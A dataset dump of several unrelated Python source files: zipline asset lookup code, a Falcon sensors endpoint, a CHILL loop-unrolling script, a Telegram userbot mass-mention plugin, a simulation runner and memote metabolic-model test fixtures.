"""
return (
self.lookup_symbol,
# lookup_future_symbol method does not use as_of date, since
# symbols are unique.
#
# Wrap the function in a lambda so that both methods share a
# signature, so that when the functions are iterated over
# the consumer can use the same arguments with both methods.
lambda symbol, _: self.lookup_future_symbol(symbol)
)
def _lookup_generic_scalar(self,
asset_convertible,
as_of_date,
matches,
missing):
"""
Convert asset_convertible to an asset.
On success, append to matches.
On failure, append to missing.
"""
if isinstance(asset_convertible, Asset):
matches.append(asset_convertible)
elif isinstance(asset_convertible, Integral):
try:
result = self.retrieve_asset(int(asset_convertible))
except SidsNotFound:
missing.append(asset_convertible)
return None
matches.append(result)
elif isinstance(asset_convertible, string_types):
for lookup in self._symbol_lookups:
try:
matches.append(lookup(asset_convertible, as_of_date))
return
except SymbolNotFound:
continue
else:
missing.append(asset_convertible)
return None
else:
raise NotAssetConvertible(
"Input was %s, not AssetConvertible."
% asset_convertible
)
def lookup_generic(self,
asset_convertible_or_iterable,
as_of_date):
"""
Convert a AssetConvertible or iterable of AssetConvertibles into
a list of Asset objects.
This method exists primarily as a convenience for implementing
user-facing APIs that can handle multiple kinds of input. It should
not be used for internal code where we already know the expected types
of our inputs.
Returns a pair of objects, the first of which is the result of the
conversion, and the second of which is a list containing any values
that couldn't be resolved.
"""
matches = []
missing = []
# Interpret input as scalar.
if isinstance(asset_convertible_or_iterable, AssetConvertible):
self._lookup_generic_scalar(
asset_convertible=asset_convertible_or_iterable,
as_of_date=as_of_date,
matches=matches,
missing=missing,
)
try:
return matches[0], missing
except IndexError:
if hasattr(asset_convertible_or_iterable, '__int__'):
raise SidsNotFound(sids=[asset_convertible_or_iterable])
else:
raise SymbolNotFound(symbol=asset_convertible_or_iterable)
# If the input is a ContinuousFuture just return it as-is.
elif isinstance(asset_convertible_or_iterable, ContinuousFuture):
return asset_convertible_or_iterable, missing
# Interpret input as iterable.
try:
iterator = iter(asset_convertible_or_iterable)
except TypeError:
raise NotAssetConvertible(
"Input was not a AssetConvertible "
"or iterable of AssetConvertible."
)
for obj in iterator:
if isinstance(obj, ContinuousFuture):
matches.append(obj)
else:
self._lookup_generic_scalar(obj, as_of_date, matches, missing)
return matches, missing
def map_identifier_index_to_sids(self, index, as_of_date):
"""
This method is for use in sanitizing a user's DataFrame or Panel
inputs.
Takes the given index of identifiers, checks their types, builds assets
if necessary, and returns a list of the sids that correspond to the
input index.
Parameters
----------
index : Iterable
An iterable containing ints, strings, or Assets
as_of_date : pandas.Timestamp
A date to be used to resolve any dual-mapped symbols
Returns
-------
List
A list of integer sids corresponding to the input index
"""
# This method assumes that the type of the objects in the index is
# consistent and can, therefore, be taken from the first identifier
first_identifier = index[0]
# Ensure that input is AssetConvertible (integer, string, or Asset)
if not isinstance(first_identifier, AssetConvertible):
raise MapAssetIdentifierIndexError(obj=first_identifier)
# If sids are provided, no mapping is necessary
if isinstance(first_identifier, Integral):
return index
# Look up all Assets for mapping
matches = []
missing = []
for identifier in index:
self._lookup_generic_scalar(identifier, as_of_date,
matches, missing)
if missing:
raise ValueError("Missing assets for identifiers: %s" % missing)
# Return a list of the sids of the found assets
return [asset.sid for asset in matches]
def _compute_asset_lifetimes(self):
"""
Compute and cache a recarry of asset lifetimes.
"""
equities_cols = self.equities.c
buf = np.array(
tuple(
sa.select((
equities_cols.sid,
equities_cols.start_date,
equities_cols.end_date,
)).execute(),
), dtype='<f8', # use doubles so we get NaNs
)
lifetimes = np.recarray(
buf=buf,
shape=(len(buf),),
dtype=[
('sid', '<f8'),
('start', '<f8'),
('end', '<f8')
],
)
start = lifetimes.start
end = lifetimes.end
start[np.isnan(start)] = 0 # convert missing starts to 0
end[np.isnan(end)] = np.iinfo(int).max # convert missing end to INTMAX
# Cast the results back down to int.
return lifetimes.astype([
('sid', '<i8'),
('start', '<i8'),
('end', '<i8'),
])
def lifetimes(self, dates, include_start_date):
"""
Compute a DataFrame representing asset lifetimes for the specified date
range.
Parameters
----------
dates : pd.DatetimeIndex
The dates for which to compute lifetimes.
include_start_date : bool
Whether or not to count the asset as alive on its start_date.
This is useful in a backtesting context where `lifetimes` is being
used to signify "do I have data for this asset as of the morning of
this date?" For many financial metrics, (e.g. daily close), data
isn't available for an asset until the end of the asset's first
day.
Returns
-------
lifetimes : pd.DataFrame
A frame of dtype bool with `dates` as index and an Int64Index of
assets as columns. The value at `lifetimes.loc[date, asset]` will
be True iff `asset` existed on `date`. If `include_start_date` is
False, then lifetimes.loc[date, asset] will be false when date ==
asset.start_date.
See Also
--------
numpy.putmask
zipline.pipeline.engine.SimplePipelineEngine._compute_root_mask
"""
# This is a less than ideal place to do this, because if someone adds
# assets to the finder after we've touched lifetimes we won't have
# those new assets available. Mutability is not my favorite
# programming feature.
if self._asset_lifetimes is None:
self._asset_lifetimes = self._compute_asset_lifetimes()
lifetimes = self._asset_lifetimes
raw_dates = as_column(dates.asi8)
if include_start_date:
mask = lifetimes.start <= raw_dates
else:
mask = lifetimes.start < raw_dates
mask &= (raw_dates <= lifetimes.end)
return pd.DataFrame(mask, index=dates, columns=lifetimes.sid)
class AssetConvertible(with_metaclass(ABCMeta)):
"""
ABC for types that are convertible to integer-representations of
Assets.
Includes Asset, six.string_types, and Integral
"""
pass
AssetConvertible.register(Integral)
AssetConvertible.register(Asset)
# Use six.string_types for Python2/3 compatibility
for _type in string_types:
AssetConvertible.register(_type)
class NotAssetConvertible(ValueError):
pass
class PricingDataAssociable(with_metaclass(ABCMeta)):
"""
ABC for types that can be associated with pricing data.
Includes Asset, Future, ContinuousFuture
"""
pass
PricingDataAssociable.register(Asset)
PricingDataAssociable.register(Future)
PricingDataAssociable.register(ContinuousFuture)
def was_active(reference_date_value, asset):
"""
Whether or not `asset` was active at the time corresponding to
`reference_date_value`.
Parameters
----------
reference_date_value : int
Date, represented as nanoseconds since EPOCH, for which we want to know
if `asset` was alive. This is generally the result of accessing the
`value` attribute of a pandas Timestamp.
asset : Asset
The asset object to check.
Returns
-------
was_active : bool
Whether or not the `asset` existed at the specified time.
"""
return (
asset.start_date.value
<= reference_date_value
<= asset.end_date.value
)
def only_active_assets(reference_date_value, assets):
"""
Filter an iterable of Asset objects down to just assets that were alive at
the time corresponding to `reference_date_value`.
Parameters
----------
reference_date_value : int
Date, represented as nanoseconds since EPOCH, for which we want to know
if `asset` was alive. This is generally the result of accessing the
`value` attribute of a pandas Timestamp.
assets : iterable[Asset]
The assets to filter.
Returns
-------
active_assets : list
List of the active assets from `assets` on the requested date.
"""
return [a for a in assets if was_active(reference_date_value, a)]
| 33.08662 | 79 | 0.584701 |
ace8d0489e59bc8af8aad1550f95b3ae46ae7079 | 2,292 | py | Python | catalog/client/services/sensors.py | eoss-cloud/madxxx_catalog_api | ef37374a36129de4f0a6fe5dd46b5bc2e2f01d1d | [
"MIT"
] | null | null | null | catalog/client/services/sensors.py | eoss-cloud/madxxx_catalog_api | ef37374a36129de4f0a6fe5dd46b5bc2e2f01d1d | [
"MIT"
] | null | null | null | catalog/client/services/sensors.py | eoss-cloud/madxxx_catalog_api | ef37374a36129de4f0a6fe5dd46b5bc2e2f01d1d | [
"MIT"
] | null | null | null | #-*- coding: utf-8 -*-
""" EOSS catalog system
functionality for the sensors endpoint
"""
__author__ = "Thilo Wehrmann, Steffen Gebhardt"
__copyright__ = "Copyright 2016, EOSS GmbH"
__credits__ = ["Thilo Wehrmann", "Steffen Gebhardt"]
__license__ = "GPL"
__version__ = "1.0.0"
__maintainer__ = "Thilo Wehrmann"
__email__ = "twehrmann@eoss.cloud"
__status__ = "Production"
import ujson
import logging
import falcon
from api import General_Structure
from client.services.root_service import struct
from api_logging import logger
from .db_calls import Persistance
from .tools import can_zip_response, compress_body
class Sensors:
def __init__(self):
self.logger = logging.getLogger('eoss.' + __name__)
self.default_status = falcon.HTTP_200
self.default_content_type = 'application/json'
self.headers = {'api-version': struct['version'],
'Content-Type': self.default_content_type}
def on_get(self, req, resp, group=None):
"""Handles GET requests
http://localhost:8000/sensors
http://localhost:8000/sensors/platform (sensor_level, mission, platform)
"""
if group:
logger.info('[GET] /sensors/%s' % group)
else:
logger.info('[GET] /sensors/')
for key, value in self.headers.iteritems():
resp.set_header(key, value)
# set default group to sensor_level
if not group:
group = 'sensor_level'
results = list()
for counter, result in enumerate(Persistance().get_sensors(group)):
values = {'sensor_name': result[1], 'proc_level': result[2], 'id': counter,
'label': '%s' % result[0], 'type': group}
types = {'sensor_name': str, 'proc_level': str, 'id': int, 'label': str, 'type': str}
x = General_Structure(values, types)
x.__class__.__name__ = 'Sensor'
results.append(x.__dict__)
if len(results) == 0:
raise falcon.HTTPNotFound()
resp.status = self.default_status
if can_zip_response(req.headers):
resp.set_header('Content-Encoding', 'gzip')
resp.body = compress_body(ujson.dumps(results))
else:
resp.body = ujson.dumps(results)
| 32.28169 | 97 | 0.628709 |
ace8d0ad7c0cbd9cd70601331cd61e119571c10f | 313 | py | Python | chill/examples/chill/testcases/trmm.py | CompOpt4Apps/Artifact-DataDepSimplify | 4fa1bf2bda2902fec50a54ee79ae405a554fc9f4 | [
"MIT"
] | 5 | 2019-05-20T03:35:41.000Z | 2021-09-16T22:22:13.000Z | chill/examples/chill/testcases/trmm.py | CompOpt4Apps/Artifact-DataDepSimplify | 4fa1bf2bda2902fec50a54ee79ae405a554fc9f4 | [
"MIT"
] | null | null | null | chill/examples/chill/testcases/trmm.py | CompOpt4Apps/Artifact-DataDepSimplify | 4fa1bf2bda2902fec50a54ee79ae405a554fc9f4 | [
"MIT"
] | null | null | null | # Unroll-and-jam nonrectangular loop nest using example of triangular
# matrix multiply. Compare with paper "Register Tiling in
# Nonrectangular Iteration Spaces" by Jimenez et al, TOPLAS 2002.
from chill import *
source('trmm.c')
procedure('trmm')
loop(0)
original()
unroll(0,2,2)
unroll(0,3,2)
print_code()
| 19.5625 | 69 | 0.753994 |
ace8d1acd30fe2c667d13d8e619abbe2fe18ce00 | 512 | py | Python | lab2/part2/simulationrun.py | vtaxiarchis/distributed_systems_advanced | 3bbf6e2b45af1cc535ca08caf61d8031ba644aae | [
"MIT"
] | null | null | null | lab2/part2/simulationrun.py | vtaxiarchis/distributed_systems_advanced | 3bbf6e2b45af1cc535ca08caf61d8031ba644aae | [
"MIT"
] | null | null | null | lab2/part2/simulationrun.py | vtaxiarchis/distributed_systems_advanced | 3bbf6e2b45af1cc535ca08caf61d8031ba644aae | [
"MIT"
] | null | null | null | #!/bin/pyton
import random
import sys
millisecond = 10000000
def special():
return True
def run(argv,t,r,n,gain):
if len(argv) <= 2:
seconds = 40
else:
seconds = int(sys.argv[2])
for i in range(0,n):
t.getNode(i).bootAtTime(random.randint(0,1*millisecond))
print "Running for", seconds, "seconds:", seconds * 10000000000
t.runNextEvent()
time = t.time()
while (time + seconds * 1000 * millisecond > t.time()):
#print "ping"
t.runNextEvent()
| 20.48 | 67 | 0.607422 |
ace8d1c126be998be318caa96811b8e3535c2584 | 4,968 | py | Python | userbot/modules/tag_all.py | SharingUserbot/Man-Userbot | 6d8ec13a1639d3f0bf641522f8226afccf1c12b8 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/tag_all.py | SharingUserbot/Man-Userbot | 6d8ec13a1639d3f0bf641522f8226afccf1c12b8 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | userbot/modules/tag_all.py | SharingUserbot/Man-Userbot | 6d8ec13a1639d3f0bf641522f8226afccf1c12b8 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 1 | 2022-03-10T13:22:19.000Z | 2022-03-10T13:22:19.000Z | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
# ReCode by @mrismanaziz
# FROM Man-Userbot <https://github.com/mrismanaziz/Man-Userbot>
# t.me/SharingUserbot & t.me/Lunatic0de
import asyncio
import random
import re
from userbot import CMD_HANDLER as cmd
from userbot import CMD_HELP, bot
from userbot.events import man_cmd
usernexp = re.compile(r"@(\w{3,32})\[(.+?)\]")
nameexp = re.compile(r"\[([\w\S]+)\]\(tg://user\?id=(\d+)\)\[(.+?)\]")
emoji = "๐ ๐ ๐ ๐ ๐ ๐
๐ ๐คฃ ๐ญ ๐ ๐ ๐ ๐ ๐ฅฐ ๐ ๐คฉ ๐ฅณ ๐ค ๐ ๐ โบ๏ธ ๐ ๐ ๐ ๐ ๐คญ ๐ถ ๐ ๐ ๐ ๐ ๐ ๐ ๐ ๐คช ๐ค ๐คจ ๐ง ๐ ๐ ๐ค ๐ ๐คฌ โน๏ธ ๐ ๐ ๐ ๐ฅบ ๐ณ ๐ฌ ๐ค ๐คซ ๐ฐ ๐จ ๐ง ๐ฆ ๐ฎ ๐ฏ ๐ฒ ๐ฑ ๐คฏ ๐ข ๐ฅ ๐ ๐ ๐ ๐ฃ ๐ฉ ๐ซ ๐คค ๐ฅฑ ๐ด ๐ช ๐ ๐ ๐ ๐ ๐ฒ ๐งฉ โ ๐ฏ ๐ณ ๐ญ๐ ๐ ๐ ๐ ๐ โค๏ธโ๐ฅ ๐ ๐ค ๐ค ๐ค โค๏ธ ๐งก ๐ ๐ ๐ ๐ ๐ ๐ ๐ต ๐ฆ ๐ฏ ๐ฑ ๐ถ ๐บ ๐ป ๐จ ๐ผ ๐น ๐ญ ๐ฐ ๐ฆ ๐ฆ ๐ฎ ๐ท ๐ฝ ๐ ๐ฆ ๐ฆ ๐ด ๐ธ ๐ฒ ๐ฆ ๐ ๐ฆ ๐ฆ ๐ข ๐ ๐ ๐ ๐ ๐ ๐ ๐ฉ ๐ ๐ฆฎ ๐โ๐ฆบ ๐
๐ ๐ ๐ ๐ ๐ ๐ ๐ ๐ ๐ ๐ฆ ๐ฆ ๐ฆฅ ๐ฆ ๐ ๐ฆ ๐ฆ ๐ฆ ๐ ๐ฆ ๐ฆง ๐ช ๐ซ ๐ฟ๏ธ ๐ฆจ ๐ฆก ๐ฆ ๐ฆฆ ๐ฆ ๐ ๐ ๐ฃ ๐ค ๐ฅ ๐ฆ ๐ฆ ๐ฆ
๐ฆ ๐๏ธ ๐ฆข ๐ฆฉ ๐ฆ ๐ฆ ๐ฆ ๐ง ๐ฆ ๐ฌ ๐ ๐ณ ๐ ๐ ๐ก ๐ฆ ๐ฆ ๐ฆ ๐ฆ ๐ ๐ฆช ๐ฆ ๐ท๏ธ ๐ฆ ๐ ๐ ๐ฆ ๐ฆ ๐ ๐ ๐ ๐ธ๏ธ ๐ ๐พ ๐ ๐คข ๐คฎ ๐คง ๐ค ๐ ๐ ๐ ๐ ๐ ๐ ๐ฅญ ๐ ๐ ๐ถ ๐ ๐ฅ ๐ ๐ ๐ ๐ ๐ ๐ฅ ๐ ๐ง
๐ฝ ๐ฅฆ ๐ฅ ๐ฅฌ ๐ฅ ๐ฅฏ ๐ฅ ๐ฅ ๐ ๐ฅ ๐ฐ ๐ฅ ๐ง ๐ ๐ง ๐ฅ ๐ฅ ๐ง ๐ฅ ๐ฅฉ ๐ ๐ ๐ฅ ๐ฏ ๐ฎ ๐ ๐ ๐ฅจ ๐ฅช ๐ญ ๐ ๐ง ๐ฅ ๐ ๐ฅซ ๐ฅฃ ๐ฅ ๐ฒ ๐ ๐ ๐ข ๐ฅ ๐ฑ ๐ ๐ฅก ๐ค ๐ฃ ๐ฆ ๐ฆช ๐ ๐ก ๐ฅ ๐ฅฎ ๐ง ๐จ".split(
" "
)
class FlagContainer:
is_active = False
@bot.on(man_cmd(outgoing=True, pattern=r"mention(?: |$)(.*)"))
async def _(event):
if event.fwd_from:
return
await event.delete()
query = event.pattern_match.group(1)
mentions = f"@all {query}"
chat = await event.get_input_chat()
async for x in bot.iter_participants(chat, 100500):
mentions += f"[\u2063](tg://user?id={x.id} {query})"
await bot.send_message(chat, mentions, reply_to=event.message.reply_to_msg_id)
@bot.on(man_cmd(outgoing=True, pattern=r"emojitag(?: |$)(.*)"))
async def _(event):
if event.fwd_from or FlagContainer.is_active:
return
try:
FlagContainer.is_active = True
text = None
args = event.message.text.split(" ", 1)
if len(args) > 1:
text = args[1]
chat = await event.get_input_chat()
await event.delete()
tags = list(
map(
lambda m: f"[{random.choice(emoji)}](tg://user?id={m.id})",
await event.client.get_participants(chat),
),
)
current_pack = []
async for participant in event.client.iter_participants(chat):
if not FlagContainer.is_active:
break
current_pack.append(participant)
if len(current_pack) == 5:
tags = list(
map(
lambda m: f"[{random.choice(emoji)}](tg://user?id={m.id})",
current_pack,
),
)
current_pack = []
if text:
tags.append(text)
await event.client.send_message(event.chat_id, " ".join(tags))
await asyncio.sleep(2)
finally:
FlagContainer.is_active = False
@bot.on(man_cmd(outgoing=True, pattern=r"all(?: |$)(.*)"))
async def _(event):
if event.fwd_from or FlagContainer.is_active:
return
try:
FlagContainer.is_active = True
text = None
args = event.message.text.split(" ", 1)
if len(args) > 1:
text = args[1]
chat = await event.get_input_chat()
await event.delete()
tags = list(
map(
lambda m: f"[{m.first_name}](tg://user?id={m.id})",
await event.client.get_participants(chat),
),
)
jumlah = []
async for participant in event.client.iter_participants(chat):
if not FlagContainer.is_active:
break
jumlah.append(participant)
if len(jumlah) == 5:
tags = list(
map(
lambda m: f"[{m.first_name}](tg://user?id={m.id})",
jumlah,
),
)
jumlah = []
if text:
tags.append(text)
await event.client.send_message(event.chat_id, " ".join(tags))
await asyncio.sleep(2)
finally:
FlagContainer.is_active = False
CMD_HELP.update(
{
"tag": f"**Plugin : **`tag`\
\n\n โข **Syntax :** `{cmd}mention`\
\n โข **Function : **Untuk Menmention semua anggota yang ada di group tanpa menyebut namanya.\
\n\n โข **Syntax :** `{cmd}all` <text>\
\n โข **Function : **Untuk Mengetag semua anggota Maksimal 3.000 orang yg akan ditag di grup untuk mengurangi flood wait telegram.\
\n\n โข **Syntax :** `{cmd}emojitag` <text>\
\n โข **Function : **Untuk Mengetag semua anggota di grup dengan random emoji berbeda.\
\n\n โข **NOTE :** Untuk Memberhentikan Tag ketik `.restart`\
"
}
)
| 34.027397 | 607 | 0.47504 |
ace8d22bce0aca426103ab422fe556a77501a0c9 | 33,087 | py | Python | tests/test_for_support/test_for_basic.py | matthiaskoenig/memote | 7c14cd304523dda83eaf4835ee007243e8673f85 | [
"Apache-2.0"
] | null | null | null | tests/test_for_support/test_for_basic.py | matthiaskoenig/memote | 7c14cd304523dda83eaf4835ee007243e8673f85 | [
"Apache-2.0"
] | null | null | null | tests/test_for_support/test_for_basic.py | matthiaskoenig/memote | 7c14cd304523dda83eaf4835ee007243e8673f85 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2016 Novo Nordisk Foundation Center for Biosustainability,
# Technical University of Denmark.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Ensure the expected functioning of ``memote.support.basic``."""
from __future__ import absolute_import
import cobra
import pytest
import memote.support.basic as basic
import memote.support.helpers as helpers
from memote.utils import register_with
MODEL_REGISTRY = dict()
@register_with(MODEL_REGISTRY)
def three_missing(base):
base.add_metabolites([cobra.Metabolite(id="M{0:d}".format(i))
for i in range(1, 4)])
return base
@register_with(MODEL_REGISTRY)
def three_present(base):
base.add_metabolites(
[cobra.Metabolite(id="M{0:d}".format(i), formula="CH4", charge=-1)
for i in range(1, 4)]
)
return base
@register_with(MODEL_REGISTRY)
def gpr_present(base):
"""Provide a model with reactions that all have GPR"""
rxn_1 = cobra.Reaction("RXN1")
rxn_1.gene_reaction_rule = 'gene1 or gene2'
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
base.add_reactions([rxn_1])
return base
@register_with(MODEL_REGISTRY)
def gpr_present_complex(base):
"""Provide a model with reactions that all have GPR"""
rxn_1 = cobra.Reaction("RXN1")
rxn_1.gene_reaction_rule = 'gene1 and gene2'
rxn_2 = cobra.Reaction("RXN2")
rxn_2.gene_reaction_rule = '(gene4 and gene7) or ' \
'(gene9 and (gene10 or gene14))'
rxn_3 = cobra.Reaction("RXN3")
rxn_3.gene_reaction_rule = 'gene1 and gene2'
base.add_reactions([rxn_1, rxn_2, rxn_3])
return base
@register_with(MODEL_REGISTRY)
def gpr_missing(base):
"""Provide a model reactions that lack GPR"""
rxn_1 = cobra.Reaction("RXN1")
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
base.add_reactions([rxn_1])
return base
@register_with(MODEL_REGISTRY)
def gpr_missing_with_exchange(base):
"""Provide a model reactions that lack GPR"""
rxn_1 = cobra.Reaction("RXN1")
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
rxn_2 = cobra.Reaction("EX_met1_c")
met_1 = cobra.Metabolite("met1")
rxn_2.add_metabolites({met_1: 1})
base.add_reactions([rxn_1, rxn_2])
return base
@register_with(MODEL_REGISTRY)
def gpr_present_not_lumped(base):
"""Provide a model with reactions that all have GPR"""
rxn_1 = cobra.Reaction("RXN1")
rxn_1.gene_reaction_rule = 'gene1'
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
base.add_reactions([rxn_1])
return base
@register_with(MODEL_REGISTRY)
def unconstrained_rxn(base):
"""Provide a model with one unconstrained reaction"""
rxn_1 = cobra.Reaction("RXN1")
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
rxn_1.bounds = -1000, 1000
base.add_reactions([rxn_1])
return base
@register_with(MODEL_REGISTRY)
def irreversible_rxn(base):
"""Provide a model with one irreversible reaction"""
rxn_1 = cobra.Reaction("RXN1")
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
rxn_1.bounds = 0, 1000
base.add_reactions([rxn_1])
return base
@register_with(MODEL_REGISTRY)
def zero_constrained_rxn(base):
"""Provide a model with one zero-constrained reaction"""
rxn_1 = cobra.Reaction("RXN1")
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
rxn_1.bounds = 0, 0
base.add_reactions([rxn_1])
return base
@register_with(MODEL_REGISTRY)
def nonzero_constrained_rxn(base):
"""Provide a model with one nonzero-constrained reaction"""
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
met_3 = cobra.Metabolite("met3")
met_4 = cobra.Metabolite("met4")
rxn_1 = cobra.Reaction("RXN1")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
rxn_2 = cobra.Reaction("RXN2")
rxn_2.add_metabolites({met_2: -1, met_3: -1})
rxn_3 = cobra.Reaction("RXN3")
rxn_3.add_metabolites({met_3: -1, met_4: 1})
rxn_1.bounds = -1000, 1000
rxn_2.bounds = -1000, 1000
rxn_3.bounds = 0, 10
base.add_reactions([rxn_1, rxn_2, rxn_3])
return base
@register_with(MODEL_REGISTRY)
def no_nonzero_constrained_rxn(base):
"""Provide a model with no nonzero-constrained reactions"""
met_1 = cobra.Metabolite("met1")
met_2 = cobra.Metabolite("met2")
met_3 = cobra.Metabolite("met3")
met_4 = cobra.Metabolite("met4")
rxn_1 = cobra.Reaction("RXN1")
rxn_1.add_metabolites({met_1: 1, met_2: -1})
rxn_2 = cobra.Reaction("RXN2")
rxn_2.add_metabolites({met_2: -1, met_3: -1})
rxn_3 = cobra.Reaction("RXN3")
rxn_3.add_metabolites({met_3: -1, met_4: 1})
rxn_1.bounds = -1000, 1000
rxn_2.bounds = -1000, 1000
rxn_3.bounds = 0, 1000
base.add_reactions([rxn_1, rxn_2, rxn_3])
return base
@register_with(MODEL_REGISTRY)
def ngam_present(base):
"""Provide a model with a correct NGAM reaction"""
met_g = cobra.Metabolite("atp_c", "C10H12N5O13P3", compartment="c")
met_h = cobra.Metabolite("adp_c", "C10H12N5O10P2", compartment="c")
met_i = cobra.Metabolite("h_c", "H", compartment="c")
met_j = cobra.Metabolite("h2o_c", "H2O", compartment="c")
met_k = cobra.Metabolite("pi_c", "HO4P", compartment="c")
rxn_1 = cobra.Reaction("ATPM", name="non-growth associated maintenance")
rxn_1.add_metabolites({met_g: -1, met_h: 1, met_i: 1, met_j: -1, met_k: 1})
rxn_1.lower_bound = 8.39
base.add_reactions([rxn_1])
return base
@register_with(MODEL_REGISTRY)
def ngam_and_atpsynthase(base):
"""Provide a model with an ATP hydrolysis and an NGAM reaction"""
met_g = cobra.Metabolite("atp_c", "C10H12N5O13P3", compartment="c")
met_h = cobra.Metabolite("adp_c", "C10H12N5O10P2", compartment="c")
met_i = cobra.Metabolite("h_e", "H", compartment="e")
met_j = cobra.Metabolite("h2o_c", "H2O", compartment="c")
met_k = cobra.Metabolite("pi_c", "HO4P", compartment="c")
met_l = cobra.Metabolite("h_c", "H", compartment="c")
rxn_1 = cobra.Reaction("ATPS", name="ATPase cytosolic")
rxn_1.add_metabolites({met_g: -1, met_h: 1, met_i: 1, met_j: -1, met_k: 1})
rxn_1.bounds = -1000, 1000
rxn_2 = cobra.Reaction("NGAM", name="non-growth associated maintenance")
rxn_2.add_metabolites({met_g: -1, met_h: 1, met_l: 1, met_j: -1, met_k: 1})
rxn_2.bounds = 0, 1000
base.add_reactions([rxn_1, rxn_2])
return base
@register_with(MODEL_REGISTRY)
def sufficient_compartments(base):
"""Provide a model with the minimal amount of compartments"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_b = cobra.Metabolite("a_p", compartment="p")
met_c = cobra.Metabolite("a_e", compartment="e")
rxn_a_b = cobra.Reaction("AB")
rxn_a_b.add_metabolites({met_a: 1, met_b: -1})
rxn_b_c = cobra.Reaction("BC")
rxn_b_c.add_metabolites({met_b: 1, met_c: -1})
base.add_reactions([rxn_b_c, rxn_a_b])
return base
@register_with(MODEL_REGISTRY)
def insufficient_compartments(base):
"""Provide a model with less than the minimal amount of compartments"""
met_a = cobra.Metabolite("a_c", compartment="c")
met_c = cobra.Metabolite("a_e", compartment="e")
rxn_a_c = cobra.Reaction("AC")
rxn_a_c.add_metabolites({met_a: 1, met_c: -1})
base.add_reactions([rxn_a_c])
return base
@register_with(MODEL_REGISTRY)
def non_metabolic_reactions(base):
"""Provide a model all kinds of reactions that are not purely metabolic"""
met_a = cobra.Metabolite("a_c", formula='CH4', compartment="c")
met_c = cobra.Metabolite("a_e", formula='CH4', compartment="e")
rxn_a_c = cobra.Reaction("AC")
rxn_a_c.add_metabolites({met_a: 1, met_c: -1})
biomass = cobra.Reaction("BIOMASS")
ex_a = cobra.Reaction("EX_a_e")
ex_a.add_metabolites({met_c: -1})
base.add_reactions([rxn_a_c, biomass, ex_a])
return base
@register_with(MODEL_REGISTRY)
def transport_gpr(base):
"""Provide a model with a transport reaction without GPR."""
met_a = cobra.Metabolite("co2_c", formula='CO2', compartment="c")
met_b = cobra.Metabolite("co2_e", formula='CO2', compartment="e")
met_c = cobra.Metabolite("na_c", formula='Na', compartment="c")
met_d = cobra.Metabolite("na_e", formula='Na', compartment="e")
uni = cobra.Reaction("UNI")
uni.gene_reaction_rule="X and Y"
uni.add_metabolites({met_a: 1, met_b: -1})
anti = cobra.Reaction("ANTI")
anti.gene_reaction_rule = "W or V"
anti.add_metabolites({met_a: 1, met_d: 1, met_b: -1, met_c: -1})
sym = cobra.Reaction("SYM")
sym.add_metabolites({met_a: 1, met_c: 1, met_b: -1, met_d: -1})
base.add_reactions([uni, anti, sym])
return base
@register_with(MODEL_REGISTRY)
def transport_gpr_constrained(base):
"""Provide a model with a constrained transport reaction without GPR."""
met_a = cobra.Metabolite("co2_c", formula='CO2', compartment="c")
met_b = cobra.Metabolite("co2_e", formula='CO2', compartment="e")
met_c = cobra.Metabolite("na_c", formula='Na', compartment="c")
met_d = cobra.Metabolite("na_e", formula='Na', compartment="e")
uni = cobra.Reaction("UNI")
uni.gene_reaction_rule="X and Y"
uni.add_metabolites({met_a: 1, met_b: -1})
anti = cobra.Reaction("ANTI")
anti.gene_reaction_rule = "W or V"
anti.add_metabolites({met_a: 1, met_d: 1, met_b: -1, met_c: -1})
sym = cobra.Reaction("SYM")
sym.add_metabolites({met_a: 1, met_c: 1, met_b: -1, met_d: -1})
sym.lower_bound = 8.39
base.add_reactions([uni, anti, sym])
return base
@register_with(MODEL_REGISTRY)
def reversible_oxygen_flow(base):
"""Provide a model with a reversible oxygen-containing reaction."""
met_a = cobra.Metabolite("o2s_e", formula="O2", compartment="e")
met_b = cobra.Metabolite("o2s_p", formula="O2", compartment="p")
rxn = cobra.Reaction("O2Stex")
rxn.add_metabolites({met_a: -1, met_b: 1})
rxn.lower_bound = -1000
rxn.upper_bound = 1000
base.add_reactions([rxn])
return base
@register_with(MODEL_REGISTRY)
def non_reversible_oxygen_flow(base):
"""Provide a model with a non-reversible oxygen-containing reaction."""
met_a = cobra.Metabolite("o2s_c", formula="O2", compartment="c")
met_b = cobra.Metabolite("o2_c", formula="O2", compartment="c")
met_c = cobra.Metabolite("h2o2_c", formula='H2O2', compartment="c")
met_i = cobra.Metabolite("h_c", "H", compartment="c")
rxn = cobra.Reaction("SPODM")
rxn.add_metabolites({met_a: -2, met_b: 1, met_c: 1, met_i: -2})
rxn.lower_bound = 0
rxn.upper_bound = 0
base.add_reactions([rxn])
return base
